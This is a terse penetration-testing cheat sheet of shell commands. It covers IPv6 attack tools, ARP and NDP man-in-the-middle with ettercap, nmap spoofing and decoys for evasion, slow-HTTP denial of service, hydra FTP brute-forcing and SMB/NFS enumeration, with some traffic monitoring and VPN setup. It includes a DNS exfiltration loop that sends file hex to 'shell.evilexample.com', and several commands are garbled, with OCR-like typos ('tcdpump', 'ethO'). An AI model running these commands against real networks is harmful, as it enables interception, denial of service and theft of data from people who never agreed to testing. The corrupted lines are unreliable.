atk6-dnsdict6 -d $Domain                ## NS and MX DNS domain information
atk6-dnsdict6 -S $Domain                ## perform SRV service name guessing
atk6-dnsdict6 -d46 -t 32 $Domain        ## number of threads


##-====================================================-##
##   [+] Performs reverse DNS enumeration given an IPv6 address.
##-====================================================-##
atk6-dnsrevenum6
atk6-dnsrevenum6 $DNSServer $IPv6Addr/64


##-====================================================-##
##   [+] traceroute that uses ICMP6.
##-====================================================-##
atk6-trace6
atk6-trace6 -d eth0 $TargetIP $Port


##-=======================================================-##
##   [+] Alive6 - Find activities on local network
##-=======================================================-##
## ------------------------------------------------------- ##
##   [?] Detect ICMPv6 echo-reply on global addresses
##   [?] Shows  alive addresses in the segment
## ------------------------------------------------------- ##
atk6-alive6 eth0
atk6-alive6 eth0 -v
atk6-alive6 tun6to4

-V         enable debug output
  -d         DNS resolve alive IPv6 addresses
  -H         print hop count of received packets

-i $File

-Z $Mac     ## Use given destination MAC address


##-=============================================================-##
##   [+] detects new ipv6 addresses joining the local network
##-=============================================================-##
atk6-detect-new-ip6 eth0

##-==========================================-##
##   [+] Announce yourself as a router
##   [+] try to become the default router
##-==========================================-##
atk6-fake_router6 eth0 1::/64
atk6-fake_router6 eth0 1::/64 $MTU $MAC


##-=======================================================-##
##   [+] Dumps all local routers and their information
##-=======================================================-##
atk6-dump_router6 eth0


##-===============================================-##
##   [+] Advertise ipv6 address on the network
##-===============================================-##
## ------------------------------------------------------------------------------ ##
##   [?] sending it to the all-nodes multicast address if no target specified.
## ------------------------------------------------------------------------------ ##
atk6-fake_dhcps6 eth0 1::/64 $DNSServer


##-=======================================================-##
##   [+] Dumps all DHCPv6 servers and their information
##-=======================================================-##
atk6-dump_dhcp6 eth0


##-==========================================-##
##   [+] parasite6 - ARP spoofer for IPv6
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?] redirecting all local traffic to your own  system
##   [?] by answering falsely to Neighbor Solicitation requests
##   [?] specifying FAKE-MAC results in a local DOS.
## ----------------------------------------------------------------- ##
atk6-parasite6 eth0 $FakeMAC
atk6-parasite6 -l eth0


##-==========================================-##
##   [+] frag6 -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-fragmentation6 -i eth0 --


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?] Listening for neighbor solitication passively
## ----------------------------------------------------------------- ##
atk6-passive_discovery6 eth0


##-=====================================================-##
##   [+] atk6-smurf6 - ICMPv6 echo replies - Smurf attack
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?] Target of echo request is the local all-nodes multicast address if not specified.
## ----------------------------------------------------------------- ##
atk6-smurf6 eth0 $TargetIP multicast-network-address
atk6-smurf6 eth0 2001::1


##-==========================================-##
##   [+] firewall6 -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-firewall6 -H eth0 $TargetIP $DstPort


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-implementation6 eth0 $TargetIP
atk6-implementation6 eth0 2001::1


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
script6 get-bruteforce-aaaa $Domain
script6 get-as $IPv6Addr
script6 get-asn $IPv6Addr
cat $File.txt | script6 get-aaaa


##-========================================================-##
##   [+] Obtain the Origin Autonomous System (AS) number
##       for the IPv6 address 2001:db8::1.
##-========================================================-##
script6 get-asn 2001:db8::1


##-====================================================================-##
##   [+] Obtain information about the Origin Autonomous System (AS)
##       of the IPv6 address 2001:db8::1.
##-====================================================================-##
script6 get-as 2001:db8::1


##-====================================================================================-##
##   [+] Map the domain names contained in the file "domains.txt" into AAAA records,
##   [+] save the results in the file "domains-aaaa.txt".
##-====================================================================================-##
cat domains.txt | script6 get-aaaa > domains-aaaa.txt


##-=======================================================================-##
##   [+] Find IPv6 blackholes in the path to each of the IPv6 addresses
##       contained in the file "domains-aaaa.txt"
##   [+] save the results to the file "trace-results.txt".
##-=======================================================================-##
cat domains-aaaa.txt | script6 trace do8 tcp port 25 > trace-results.txt


##-========================================================================================-##
##   [+] Produce statistics based on the trace results from the file "trace-results.txt"
##-========================================================================================-##
cat trace-results.txt | script6 get-trace-stats


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-flood_router6 eth0


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-flood_advertise6


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
atk6-dos-new-ip6 eth0


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##


##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##
flow6 -i eth0 -v --flow-label-policy -d IPv6ADDR

##-==========================================-##
##   [+]  -
##-==========================================-##
## ----------------------------------------------------------------- ##
##   [?]
## ----------------------------------------------------------------- ##


##-==========================================-##
##   [+] trace6 - very fast traceroute6
##-==========================================-##
atk6-trace6 eth0 $TargetIP $Port


##-=====================-##
##   [+] kill_router6
##-=====================-##
## ------------------------------------------------------ ##
##   [?] Announce that target router is going down
##   [?] to delete it from the routing tables.
## ------------------------------------------------------ ##
##   [?] If you supply a '*' as target-ip,
##   [?] kill_router6 will sniff the network for RAs
##   [?] and immediately send the kill packet.
## ------------------------------------------------------ ##
atk6-kill_router6 eth0 $TargetIP


## ------------------------------------------------------------------------------ ##
##   [?] find zombie ip in network to use them to scan:
## ------------------------------------------------------------------------------ ##
use auxiliary/scanner/ip/ipidseq
nmap -sI ip target


##-======================================-##
##   [+]
##-======================================-##
nmap --spoof-mac- Cisco --data-length 24 –T paranoid –max-hostgroup
1 – max-parallelism 10 -PN -f –D 10.1.20.5,RND:5,ME --v –n –sS
–sV–oA /desktop/pentest/nmap/out –p T:1-1024
–random-hosts 10.1.1.10 10.1.1.15


##-======================================-##
##   [+] Split in chinks of 10 minutes:
##-======================================-##
editcap -i 600 -A "2013-10-21 13:00:00" -B "2013-10-21 15:00:00" capture.pcapng part.pc


##-==========================================-##
##   [+] Splitting a file into time chunks
##-==========================================-##
editcap -i <secondes per file> <infile> <outfile>


##-======================================-##
##   [+]
##-======================================-##
mergecap $File.pcap $File.pcap $File.pcap -w $File.pcap


pcapfix

pcappick

rawshark

tcpslice

pcapip
tcpreplay


##-======================================-##
##   [+]
##-======================================-##
nast -m -i eth0


##-=================================================-##
##   [+] Read PCAP File - Extract 80 & 443 Packets
##-=================================================-##
tcpflow -c -e -r $File.pcap 'tcp and port (80 or 443)'
tcpflow -r $File.pcap tcp and port \(80 or 443\)


##-================================================-##
##   [+] Record on eth0 - Extract Port 80 Packets
##-================================================-##
tcpflow -p -c -i eth0 port 80


##-================================================-##
##   [+] Capture Port 80 With Snap Length: 96
##-================================================-##
tcpflow -i eth0 -b 96 -e -c port 80


##-================================================-##
##   [+] tcp/ip session reassembler:
##-================================================-##
tcpflow -i eth0 -e -c 'port 25'


##-================================================-##
##   [+] Process PCAP Files in Current Directory
##-================================================-##
tcpflow -o $File -a -l *.pcap


##-===================================================-##
##   [+] Record All Packets Going To & From $Domain
##   [+] Extract All of The HTTP Attachments:
##-===================================================-##
tcpflow -e scan_http -o $Dir host $Domain


##-=================================================================-##
##    [+] record traffic between helios and either hot or ace
##    [+] bin the results into 1000 files per directory
##    [+] calculate the MD5 of each flow:
##-=================================================================-##
tcpflow -X $File.xml -e scan_md5 -o $Dir -Fk host helios and \( hot or ace \)


##-===============================-##
##   [+] Monitor all TCP ports:
##-===============================-##
urlsnarf -i eth0 tcp


##-================================================-##
##   [+] Generate a target list from IP netmask
##-================================================-##
Fping -a -g 192.168.7.0/24


ifpps eth0
ifpps --promisc --dev eth0
ifpps --loop -p --csv -d wlan0 > $File.dat


## ------------------------------ ##
##    [?] Extract PCAP Data:
## ------------------------------ ##
capinfos $File.pcap
tcpslice -r $File.pcap
tcpstat $File.pcap
iftop -i $File.pcap

tcpprof -S lipn -P 30000 -r $File.pcap
tcpflow -r $File.pcap
tcpxtract -f $File.pcap -o $Dir/
tcpick -a -C -r $File.pcap
tcpcapinfo $File.pcap
ngrep -I $File.pcap
nfdump -r $File.pcap
chaosreader -ve $File.pcap
tshark -r $File.pcap
tcpdump -r $File.pcap
tcpreplay -M10 -i eth0 $File.pcap
bro -r $File.pcap
snort -r $File.pcap

capstats
flowscan
netflow
flowgrind
iproute2


flowtop --show-src
nfdump -r /and/dir/nfcapd.201107110845 -c 100 'proto tcp and ( src ip 172.16.17.18 or dst  ip  172.16.17.19  )'
nfdump -r $File 'net 8.8.8.8/32'
nfdump -r $File 'net $IP/$Subnet'


nfdump -R nfcapd.201506230459:nfcapd.201506230634 -a 'src or dst net 49.213.52.133/32'


##-======================================-##
##   [+]
##-======================================-##
ettercap -T -M arp -V [hex,ascii] /x.x.x.x/ /x.x.x.x/
ettercap -T -P repoision_arp -M arp:remote /10.10.102.50/ /10.10.102.5/

ettercap -Tq -M arp:remote -P remote_browser (-P repoison arp) /10.10.102.100/ /10.10.102.4,5/

##-======================================-##
##   [+] Mitm Ipv6 report parasite6

ettercap -Tq -w fichero -M ndp:oneway //fe80:xxxxx? //fe80:xxxxx/

fake_router6 eth0 1::/64

etterfilter filtro.filter -i filtro.ef
ettercap -Tq -F ./filtro.ef -M arp_remote -P repoision_arp /10.10.102.60/ 10/10/10


##-======================================-##
##   [+] Display The Connection Status:
##-======================================-##
tcpick -i eth0 -C


##-================================================-##
##   [+] Display The Payload and Packet Headers:
##-================================================-##
tcpick -i eth0 -C -yP -h -a


##-===============================================================-##
##   [+] Display Client Data Only
##   [+] Just For The First SMTP Connection:
##-===============================================================-##
tcpick -i eth0 -C -bCU -T1 "port 25"
tcpick -r $File.pcap -C -yP -h 'port (25 or 587)'


tcpick -r $File.pcap -C -h -yP -e 15 "port ( 21 or 20 )"

tcpick -r $File.pcap -C -h -wR -e 10 "port 25"

##-====================================-##
##   [+] Download A File Passively:
##-====================================-##
tcpick -i eth0 -wR "port ftp-data"


##-==============================================-##
##   [+] Log HTTP Data in Unique Files
##-==============================================-##
## ---------------------------------------------- ##
##   [?] (client and server mixed together):
## ---------------------------------------------- ##
tcpick -i eth0 "port 80" -wRub


##-========================================-##
##   [+] Pipe The First Connection To NC:
##-========================================-##
tcpick -i eth0 --pipe client "port 80" | gzip > $File.gz
tcpick -i eth0 --pipe server "port 25" | nc $Domain.net 25


tcpick -v5      ## Verbose Level 5

tcpick -yP      ## Shows data contained in the tcp packets.

tcpick -yX      ## Shows all data after the header
                ## in hexadecimal and ascii dump with 16 bytes per line.


tcpick -v5 --readfile $File.pcap


##-=====================================-##
##   [+] Analyse packets in real-time
##-=====================================-##
while true ; do tcpick -a -C -r $File.pcap ; sleep 2 ; clear ; done


chaosreader --dir               ## Output all files to this directory
chaosreader --verbose           ##
chaosreader -ve $File           ## Create HTML 2-way & hex files for everything
chaosreader -p $Ports $File     ## only ftp and telnet
chaosreader -s 10               ## runs tcpdump for 10 minutes and generates the log file
chaosreader --ipaddr $IP        ## Only examine these IPs
chaosreader --filter 'port 7'   ## Dump Filter - Port #
chaosreader --port 21,23        ## Only examine these ports (TCP & UDP)
chaosreader --preferdns         ## Show DNS names instead of IP addresses.
chaosreader --sort type         ## Sort Order: type
chaosreader --sort ip           ## Sort Order: ip


##-====================================================-##
##   [+]
##-====================================================-##
ngrep -t -x 'USER|PASS|RETR|STOR' tcp port ftp and host server.example.com


##-====================================================-##
##   [+] tcpstat - report network interface statistics
##-====================================================-##
tcpstat -i eth0 -o "Time: %S\tpps: %p\tpacket count: %n\tnet load: %l\tBps: %B\n"


##-====================================================-##
##   [+] ifpps - fetch and format kernel network statistics
##-====================================================-##
ifpps –dev eth0


##-====================================================-##
##   [+] monitor the network for insecure protocols:
##-====================================================-##
dsniff -m [-i interface] [-s snap-length] [filter-expression]


##-==============================================================-##
##   [+] save results in a database, instead of printing them:
##-==============================================================-##
dsniff -w $File.db


##-======================================================-##
##   [+] read and print the results from the database:
##-======================================================-##
dsniff -r $File.db


##-========================================================-##
##   [+] capture mail messages from SMTP or POP traffic:
##-========================================================-##
mailsnarf -i eth0 [-v] [regular-expression [filter-expression]]


##-=================================================-##
##   [+] capture file contents from NFS traffic:
##-=================================================-##
filesnarf -i eth0 [-v] [regular-expression [filter-expression]]


##-=========================================-##
##   [+] capture URLs from HTTP traffic:
##-=========================================-##
urlsnarf -i eth0 [-v] [regular-expression [filter-expression]]


##-==================================================-##
##   [+] search for packets containing data
##       that matches a regular expression and
##       protocols that match a filter expression:
##-==================================================-##
ngrep [grep-options] regular-expression [filter-expression]


##-===============================================-##
##   [+] search for a sequence of binary data:
##-===============================================-##
ngrep -X hexadecimal-digits [filter-expression]


##-===============================================-##
##   [+] sniff packets and save them in a file:
##-===============================================-##
ngrep -O $File [-n count] -d eth0 [-s snap-length] regular-expression [filter-expression]


##-=======================================================-##
##   [+] read and display the saved network trace data:
##-=======================================================-##
ngrep -I $File regular-expression [filter-expression]


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -q -W byline "GET|POST HTTP"


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -d eth0 "www.domain.com" port 443


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -d eth0 "www.domain.com" src host $IP and port 443


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -d eth0 -qt -O $File.pcap "www.domain.com" port 443


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -d eth0 -qt 'HTTP' 'tcp'


##-===============================================-##
##   [+]
##-===============================================-##
ngrep -l -q -d eth0 -i "User-Agent: curl*"


##-======================-##
##   [+] SSH traffic:
##-======================-##
darkstat -i eth0 -f "port 22"
darkstat -i eth0 -f "port 1194"


##-===============================================-##
##   [+]
##-===============================================-##
darkstat --verbose -i eth0 --hexdump --export $File


##-===============================================-##
##   [+]
##-===============================================-##
darkstat -i eth0 -p 80


##-=======================================================-##
##   [+] dont account for traffic between internal IPs:
##-=======================================================-##
darkstat -i eth0 -f "not (src net 192.168.0 and dst net 192.168.0)"


##-=================================================================-##
##   [+] graph all traffic entering and leaving the local network
##-=================================================================-##
darkstat -i eth0 -l 192.168.1.0/255.255.255.0


##-===============================================-##
##   [+]
##-===============================================-##
darkstat --verbose --import $File


##-===============================================-##
##   [+]
##-===============================================-##
darkstat --verbose --export $File


##-=====================================================-##
##   [+] MITM framework - Swiss Army knife for 802.11
##-=====================================================-##
bettercap -iface eth0 -X --proxy -O $File.log

bettercap -iface eth0 -caplet $File.cap


dhcpdump -i wlan0


dumpcap -f "ip host 10.0.0.129"


Test Internet Speed Using Linux Command Line

speedtest-cli --bytes
speedtest-cli --list
speedtest-cli --server server_id

speedometer -r eth0 -t eth0
speedometer -r wlan0 -t wlan0
speedometer -l  -r wlan0 -t wlan0 -m $(( 1024 * 1024 * 3 / 2 ))


sudo nethogs wlan0
sudo nethogs eth0


sudo iptraf


sudo ifstat
sudo ifstat -t -i eth0 0.5


sudo iftop -n

sudo netload eth0


sudo netwatch -e eth0 -nt
sudo trafshow -i eth0 tcp


tcpflow -p -c -i eth0 port 80


tcpdump -vvv -s 0 -l -n port 53  # print DNS outgoing queries
tcpdump -i any -w /tmp/http.log &
killall tcpdump
tcpdump -A -r /tmp/http.log | less


helpful flags (options):

sudo tcpdump -i br0 -n | egrep "91.189.95.54|91.189.95.55"


# Useful to detect DNS amplification
tcpdump -nnni bond0 -c 100 -w sample.txt dst port 53

# which bogus DNS resolvers are sending you an amplified attack.
awk '{print $3}' sample.txt | cut -d '.' -f1-4 | sort | uniq -c | sort -nr


## ---------------------------------------------------------------------------------------------------------------------------- ##


iptables -A INPUT -p tcp -d 192.168.0.12 -m tcp ! --dport 53 -j DROP
iptables -A INPUT -p udp -d 192.168.0.12 -m udp ! --dport 53 -j DROP
iptables -A INPUT -m tcp -p tcp --dport 53 -j ACCEPT


# Block All UDP Ports Through iptable Accept DNS
iptables -A INPUT -p udp --sport 53 -j ACCEPT
iptables -A INPUT -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p udp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT

iptables -A INPUT -p udp -j DROP
iptables -A OUTPUT -p udp -j DROP


## ---------------------------------------------------------------------------------------------------------------------------- ##


##-===============================================-##
##   [+]
##-===============================================-##
iftop -i eth0


iftop -i eth0 -f 'port (80 or 443)'
iftop -i eth0 -f 'ip dst 192.168.1.5'


iftop -i eth0 -F 192.168.1.0/255.255.255.0


## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -u | less               ## shows CPU usage
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -d                      ## output disk statistics.
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -b                      ## I/O and transfer rate statistics
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -n DEV 5 2              ## see how much activity came across your network interfaces
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar –u –r –n DEV          ## details about the usage of CPU, I/O, memory, and network devices
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -u 2 5                  ## Report CPU utilization for each 2 seconds. 5 lines are displayed.
## ---------------------------------------------------------------------------------------------------------------------------- ##
    sar -A                      ## Display all the statistics saved In current daily data file.
## ---------------------------------------------------------------------------------------------------------------------------- ##


## ---------------------------------------------------------------------------------------------------------------------------- ##
        sar -I 14 -o int14.file 2 10                ## Report statistics on IRQ 14 for each 2 seconds.
                                                            ## 10 lines are displayed.
                                                            ## Data is stored  In  a file called int14.file.
## ---------------------------------------------------------------------------------------------------------------------------- ##
        sar -r -n DEV -f /var/log/sysstat/sa16      ##  Display memory and network statistics
                                                                        ##  saved In daily data file 'sa16'.
## ---------------------------------------------------------------------------------------------------------------------------- ##


Default ncurses output for the eth0 device.
ifpps eth0


Ncurses output for the eth0 device in promiscuous mode.
ifpps -pd eth0

Continuous terminal output for the wlan0 device in promiscuous mode.
ifpps -lpcd wlan0 > plot.dat


The superblock          contains information about the filesystem as a whole,
                        such as its size (the exact information here depends on the filesystem).

inode                   contains all information about a file, except its name.
                        The name is stored In the directory, together with the number of the inode.

Directory entry         consists of a filename and the number of the inode which represents the file.
                        The inode contains the numbers of several data blocks, which are used to store
                        the data In the file. There is space only for a few data block numbers In the inode,

indirect blocks         These dynamically allocated blocks - used as backup for pointers to the data blocks


URLs

--proxy                 ##


httrack $Domain/$File.html --spider -P proxy.myhost.com:8080

httrack $Domain/$File.html --spider -P 10.8.0.1:1080
httrack $Domain/$File.html --spider -P 10.64.0.1:1080


--spider URLs                   ##


--stay-on-same-dir                  ##
--can-go-up                 ##
--can-go-down                   ##


--can-go-up-and-down                ## -B     can both go up&down into the directory structure


--stay-on-same-domain                   ##
--stay-on-same-address                  ##


--stay-on-same-tld                  ## -l     stay on the same TLD


--user-agent                    ##
--referer                   ##


--headers                   ##

--debug-headers                 ##


--catch-url                     -#P    catch URL


-*p3   ## save all files


--urllist                   ##
--mirror $URLs                  ##
--mirrorlinks URLs                  ##
--list                  ##
--keep-links                    ##


--cookies                   ##


--verbose                       ## -v     log on screen


--single-log            ## -f2    one single log file
--file-log              ## -f     *log in files
--debug-log             ##
--extra-log             ## -z     log - extra infos

--clean                 ##


--debug-xfrstats                ## -#T    generate transfer ops. log every minutes
--debug-ratestats               ## -#Z    generate transfer rate statictics every minutes

--debug-parsing                 ## -#d    debug parser

--debug-cache                   ## -#C    cache list

                                ## -#C  *.com/spider*.gif


--go-everywhere                     ##

--generate-errors                   ##


##-=================-##
##   [+] httpie
##-=================-##


## --------------------------------------------- ##
##   [?] print request and response headers
##   [?] request headers + response headers
## --------------------------------------------- ##
http -p Hh $Domain


## --------------------------------------------- ##
##   [?] print request and response headers
##   [?] request headers + response headers
##   [?] follow redirects
##   [?] skip SSL verification
## --------------------------------------------- ##
http -p Hh $Domain --follow --verify no


## --------------------------------------------- ##
##   [?] Use Proxy for connection
## --------------------------------------------- ##
http -p Hh $Domain --follow --verify no --proxy http:http://127.0.0.1:16379


##-========================================================================================-##
##   [+] SlowHTTPTest - application layer Denial of Service attacks simulation tool
##-========================================================================================-##
## --------------------------------------------- ##
 - Slow HTTP POST
 - Slow Read attack
     [?] based on TCP persist timer exploit
     [?] by draining concurrent connections pool
 - Apache Range Header attack
## --------------------------------------------- ##
slowhttptest -c 1000 -g -X -o slow_read_stats -r  200 -w 512 -y 1-25 -m 5 -z 32 -k 3 -u http://10.10.102.X -p 3


##-=================================-##
##   [+] Start required services:
##-=================================-##
systemctl start rpcbind

##-================================================-##
##   [+] Show file system exports on the client:
##-================================================-##
showmount -e $IP


##-======================================-##
##   [+] Mount a network file system:
##-======================================-##
mount nfs


##-==========================-##
##   [+] Find NFS Port
##-==========================-##
nmap -p 111 --script=rpcinfo.nse -vv -oN nfs_port; $IP


##-==========================-##
##   [+] Services Running
##-==========================-##
rpcinfo –p; $IP
rpcbind -p rpcinfo –p x.x.x.x


rpcinfo -p | egrep -w "port|81[14]"


##-===================================-##
##   [+] Show Mountable NFS Shares
##-===================================-##
nmap --script=nfs-showmount -oN mountable_shares; $IP; showmount -e; $IP


##-===========================================-##
##   [+]
##-===========================================-##
rpcinfo -p | egrep -w "port|81[14]"


##-================================================-##
##   [+] RPC Enumeration (Remote Procedure Call)
##-================================================-##


##-======================================================-##
##   [+] Connect to an RPC share without a
##      username and password and enumerate privileges
##-======================================================-##
rpcclient --user="" --command=enumprivs -N $IP


##-===========================================-##
##  [+] Connect to an RPC share with a
##      username and enumerate privileges
##-===========================================-##
rpcclient --user="" --command=enumprivs $IP


mount -t nfs $IP:/var/myshare /mnt/shareddrive
mount -t nfs $IP:/mountlocation /mnt/mountlocation

serverip:/mountlocation /mnt/mountlocation nfs defaults 0 0


nmap -sV --script=nfs-showmount $IP


##-========================-##
##   [+] SMB + NETBIOS
##-========================-##


##-======================-##
##  [+] Over All scan
##-======================-##
enum4linux -a $IP

##-============================================-##
##   [+] Enumerate using SMB (w/user & pass)
##-============================================-##
enum4linux -a -u <user> -p <passwd> $IP


##-=============================-##
##  [+] Enum4linux bash-loop:
##-=============================-##
for targets in $(cat $File.txt); do enum4linux $targets; done


##-=============================-##
##  [+]
##-=============================-##
enum4linux -a -v -M -l -d $1


##-============================================-##
##   [+] Guest User and null authentication
##-============================================-##
smbmap -u anonymous -p anonymous -H 10.10.10.172
smbmap -u '' -p '' -H 10.10.10.172

smbmap -H [ip] -d [domain] -u [user] -p [password]   -r --depth 5 -R


##-==============================-##
##  [+] Vulnerability Scanning
##-==============================-##
nmap --script="+\*smb\* and not brute and not dos and not fuzzer" -p 139,445 -oN smb-vuln; $IP


##-===========================-##
##  [+] Enumerate Hostnames
##-==========================-##
nmblookup -A $IP


##-====================================================-##
##   [+] List Shares with no creds and guest account
##-====================================================-##
smbmap -H \[$IP/hostname\] -u anonymous -p hokusbokus -R
nmap --script smb-enum-shares -p 139,445 $IP


##-==============================-##
##  [+] List Shares with creds
##-==============================-##
smbmap -H \[$IP\] -d \[domain\] -u \[user\] -p \[password\] -r --depth 5 -R


##-===========================-##
##   [+] Connect to share
##-===========================-##
smbclient \\\\[$IP\]\\\[share name\]


##-=======================================-##
##   [+] Netbios Information Scanning
##-=======================================-##
nbtscan -r $IP/24


##-===========================================-##
##   [+] Find Service Provided By Machines:
##-===========================================-##
nbtscan -hv $IP/24


##-===========================================-##
##   [+] Nmap find exposed Netbios servers
##-===========================================-##
nmap -sU --script nbstat.nse -p 137 $IP


##-=========================-##
##   [+] Mount smb share:
##-=========================-##
mount -t cifs //server ip/share/dir/; -o username=”guest”,password=””


##-============================================-##
##   [+] SMB Enumeration Technique - NBTSCAN
##-============================================-##


##-=======================================================-##
##   [+] NBT name scan for addresses from 10.0.2.0/24
##-=======================================================-##
nbtscan -r 10.0.2.0/24


mount -o port=2049,mountport=44096,proto=tcp 127.0.0.1:/home /home
nfs-showmount.nse script,
auxiliary/scanner/snmp/snmp_enum


## -------------------------------------------------------------------- ##
##   [?] discover available Windows shared drives or for NFS shares.
## -------------------------------------------------------------------- ##
net view \\<remote system>
showmount -e


snmpset


nmap -n -Pn -sV $IP -p $PORT --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN $OUTPUT/ftp_$IP-$PORT.nmap


hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -f -o $OUTPUT/ftp
hydra_$IP-$PORT -u $IP -s $PORT ftp


## -------------------------------------------------------------------------------------------- ##
##   [?] Checks target IP addresses against multiple DNS anti-spam and open proxy blacklists
## -------------------------------------------------------------------------------------------- ##
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'


##-===========================-##
##   [+] dns-zone-transfer:
##-===========================-##
## ---------------------------------------------------------------- ##
##   [?] Attempts to pull a zone file (AXFR) from a DNS server.
## ---------------------------------------------------------------- ##
nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain> -p53 <hosts>


nmap --script dns-brute --script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
nmap --script dns-brute www.foo.com


nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>


nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'


##-===============================-##
##   [+] Firewall/IDS evasion
##-===============================-##


-f                  ## fragment packets
-S $IP              ## spoof source address
--randomize-hosts
-D d1,d2            ## cloak scan with decoys
--source-port $SrcPort         ## spoof source port
--spoof-mac $MAC    ## change the src mac


nmap -S $SourceIP
nmap –g $SourcePort
nmap -D d1,d2
nmap --randomize-hosts

nmap --spoof-mac $MacAddr


##-===============================-##
##   [+] Capture TCP stream
##-===============================-##


##-===========================================-##
##   [+] Step1 (capture network trafic):
##-===========================================-##
tshark -i eth0 -f "port 9088" -w $File.pcap


##-===========================================-##
##   [+] Step2 (list captured tcp streams):
##-===========================================-##
tshark -r $File.pcap -T fields -e tcp.stream | sort -u


##-==============================================================-##
##   [+] Step3 (dump the content of one particular tcp stream):
##-==============================================================-##
tshark -nr $File.pcap -q -d tcp.port==9088,http -z follow,http,ascii,_your_stream_number


##-====================================-##
##   [+] DNS domain name resolutions
##-====================================-##
tshark -r HTTPS_traffic.pcap -Y "dns && dns.flags.response==0" -Tfields -e ip.dst


##-===================================================-##
##  [+] CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
##-===================================================-##
tcpdump -i ethO -c 50 -tttt 'udp and port 53'


echo "##-=================================================-##"
echo "    [+] Read In each line and do a D~S lookup          "
echo "##-=================================================-##"
for b In `cat fole.hex `; do dig $b.shell.evilexample.com; done


echo "##-==================================-##"
echo "    [+] Capture DNS Exfil Packets     "
echo "##-==================================-##"
tcdpump -w /tmp/dns -sO port 53 and host sjstem.example.com


echo "##-=================================================-##"
echo "    [+] Cut the exfil!ed hex from t~e DNS packet      "
echo "##-=================================================-##"
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d | cut -fl -d'.' | uniq received. txt


##-===========================================-##
##   [+]
##-===========================================-##
tcpdump -w $File.pcap tcp port ftp or ftp-data and host $Domain


##-===========================================-##
##   [+] PRINT ALL PING RESPONSES
##-===========================================-##
tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'


##-===========================================-##
##   [+] SHOW CONNECTIONS TO A SPECIFIC IP
##-===========================================-##
tcpdump -i ethO -tttt dst $DstIP and not net 192.168.1.0/24


##-==============================-##
##   [+] Generate Certificates:
##-==============================-##


##-========================================-##
##   [+] Generate a public and private
##   [+] certificate on the server:
##-========================================-##
umask 077
wg genkey | tee server_private_key | wg pubkey > server_public_key


Enable IPv4 Forwarding
## Enable IPv4 forwarding so that we can access the rest of the LAN and not just the server itself.
## Open /etc/sysctl.conf and comment out the following line

net.ipv4.ip_forward=1

## Step 5: Restart the server, or use the following commands for the IP forwarding to take effect without restarting the server


sysctl -p
echo 1 > /proc/sys/net/ipv4/ip_forward


## Start WireGuard:


##   [+] Start WireGuard on the Server


enable WireGuard to start automatically
when the server starts.

chown -v root:root /etc/wireguard/wg0.conf
chmod -v 600 /etc/wireguard/wg0.conf
wg-quick up wg0
systemctl enable wg-quick@wg0.service


Generate Certificates
## Generate a public and private certificate on the client

wg genkey | tee client_private_key | wg pubkey > client_public_key


##-=======================================-##
##   [+] Run our configuration script
##-=======================================-##
curl -LO https://mullvad.net/media/files/mullvad-wg.sh && chmod +x ./mullvad-wg.sh && ./mullvad-wg.sh

##-================================================================-##
##   [+] Set the correct permissions so only root can read them:
##-================================================================-##
sudo chown root:root -R /etc/wireguard && sudo chmod 600 -R /etc/wireguard

##-===============================================-##
##   [+] start WireGuard automatically on boot
##-===============================================-##
systemctl enable wg-quick@mullvad-se4

##-=============================-##
##   [+] Turn on WireGuard
##-=============================-##
wg-quick up mullvad-se4

##-=============================-##
##   [+] Turn off WireGuard
##-=============================-##
wg-quick down mullvad-se4


useradd --home /etc/openvpn --user-group --shell /bin/false tunnel

if [ -d /run/systemd/system ] ; then
   systemd-tmpfiles --create /usr/lib/tmpfiles.d/50_openvpn-unpriv.conf >/dev/null || true
   systemctl --system daemon-reload >/dev/null || true
fi


